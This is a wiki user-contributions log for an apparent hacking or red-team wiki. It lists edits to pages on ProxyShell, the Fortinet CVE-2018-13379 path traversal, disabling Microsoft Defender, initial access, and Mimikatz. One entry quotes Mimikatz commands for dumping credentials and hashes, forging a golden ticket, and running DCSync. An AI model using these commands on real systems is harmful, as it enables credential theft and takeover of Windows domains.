User contributions for Booda
Jump to navigation
Jump to search
7 July 2023
- 11:4311:43, 7 July 2023 diff hist +30 m Initial Access Tactics, techniques and procedures →Spray and pray
- 10:4410:44, 7 July 2023 diff hist +23 m Learn to hack →Post exploitation
- 10:4410:44, 7 July 2023 diff hist +1,236 N Disable Defender Disable MS defender via cmdlets
6 July 2023
5 July 2023
- 13:1613:16, 5 July 2023 diff hist +4 m Proxyshell →Exploiting proxyshell - CVE-2021-34473
- 12:1812:18, 5 July 2023 diff hist +2 m Proxyshell No edit summary
- 10:2310:23, 5 July 2023 diff hist −537 m Fortinet SSL VPN Path Traversal No edit summary current
- 09:1709:17, 5 July 2023 diff hist +1 m Fortinet SSL VPN Path Traversal →Exploiting CVE-2018-13379 Forti SSL VPN
- 09:1709:17, 5 July 2023 diff hist −1 Fortinet SSL VPN Path Traversal →Exploiting CVE-2018-13379 Forti SSL VPN
- 09:1409:14, 5 July 2023 diff hist 0 m Fortinet SSL VPN Path Traversal No edit summary
- 09:1009:10, 5 July 2023 diff hist −20 m Fortinet SSL VPN Path Traversal →Exploiting CVE-2018-13379 Forti SSL VPN
- 09:0709:07, 5 July 2023 diff hist +3,021 N Fortinet SSL VPN Path Traversal Explanation on how to exploit CVE-2018-13379 [Basic]
- 08:4708:47, 5 July 2023 diff hist +4 m Proxyshell No edit summary
- 08:3508:35, 5 July 2023 diff hist +129 m Proxyshell No edit summary
- 08:2308:23, 5 July 2023 diff hist +71 m Initial Access Tactics, techniques and procedures →Spray and pray
- 08:2208:22, 5 July 2023 diff hist 0 m Proxyshell →Shelling a target
- 08:1708:17, 5 July 2023 diff hist +10 m Proxyshell No edit summary
- 08:1608:16, 5 July 2023 diff hist +225 m Proxyshell No edit summary
- 08:1308:13, 5 July 2023 diff hist +2,132 N Proxyshell Tutorial for exploiting proxyshell [basic]
1 July 2023
27 June 2023
- 22:4922:49, 27 June 2023 diff hist +46 m Learn to hack →C2 Frameworks
- 21:3821:38, 27 June 2023 diff hist +46 m Learn to hack →API Hacking
26 June 2023
- 17:4017:40, 26 June 2023 diff hist +22 m Mimikatz →Show recently logged on users
- 07:2107:21, 26 June 2023 diff hist +25 m Mimikatz →Wdigest - extracting passwords in cleartext
- 07:2007:20, 26 June 2023 diff hist −2 m Mimikatz →Stealing plain text credentials
- 06:1106:11, 26 June 2023 diff hist +26 m Mimikatz No edit summary
25 June 2023
- 12:5812:58, 25 June 2023 diff hist +37 m Learn to hack →Red Team: Windows
- 12:0412:04, 25 June 2023 diff hist +155 m Initial Access Tactics, techniques and procedures →Password attacks
- 10:0810:08, 25 June 2023 diff hist −1 m Mimikatz →Dump lsass visa task manager
- 10:0710:07, 25 June 2023 diff hist +195 m Mimikatz No edit summary
- 00:2300:23, 25 June 2023 diff hist +32 m Initial Access Tactics, techniques and procedures →Passwords
24 June 2023
- 22:2522:25, 24 June 2023 diff hist 0 Mimikatz →Wdigest - Extracting passwords in cleartext
- 22:2422:24, 24 June 2023 diff hist 0 Mimikatz →Pass the Hash
- 22:2422:24, 24 June 2023 diff hist +1 Learn to hack →Red Team: Windows
- 22:2322:23, 24 June 2023 diff hist 0 m Mimikatz →Wdigest - Extracting Passwords in Cleartext
- 22:2222:22, 24 June 2023 diff hist +3 m Mimikatz →Wdigest - Extracting Passwords in Cleartext
- 22:2122:21, 24 June 2023 diff hist +200 m Mimikatz No edit summary
- 22:1822:18, 24 June 2023 diff hist +21 m Mimikatz →Steal creds
- 22:1722:17, 24 June 2023 diff hist +23 m Mimikatz →Retrieve the password hashes of user accounts from a domain controller
- 22:1622:16, 24 June 2023 diff hist +19 m Mimikatz →Create a golden ticket on DC
- 22:1622:16, 24 June 2023 diff hist +37 m Mimikatz →Create a golden ticket on DC
- 22:1522:15, 24 June 2023 diff hist +6 Mimikatz →Retrieve the password hashes of user accounts from a domain controller
- 22:1522:15, 24 June 2023 diff hist +26 Mimikatz →Pass the Hash
- 22:1422:14, 24 June 2023 diff hist −19 m Mimikatz →Create a golden ticket on DC
- 22:1322:13, 24 June 2023 diff hist +552 N Mimikatz Created page with "=== Steal creds === * privilege::debug * sekurlsa::logonpasswords === Dump Hashes === * token::elevate * lsadump::sam * lsadump::lsa /patch * lsadump::lsa /inject * lsadump::cache * sekurlsa::ekeys === Create a golden ticket on DC === * privilege::debug * lsadump::lsa /inject /name:krbtgt * kerberos::golden /user:administrator /domain:ulaser /sid: /krbtgt: /id: * misc::cmd === Retrieve the password hashes of user accounts from a domain controller === * lsadump::dcsync..."
- 22:1022:10, 24 June 2023 diff hist +63 m Learn to hack →Post exploitation
- 21:5921:59, 24 June 2023 diff hist +67 m Learn to hack →Red Team: Windows
- 21:5821:58, 24 June 2023 diff hist +324 m Learn to hack →Red Team: Windows
- 18:0118:01, 24 June 2023 diff hist −2 m Learn to hack No edit summary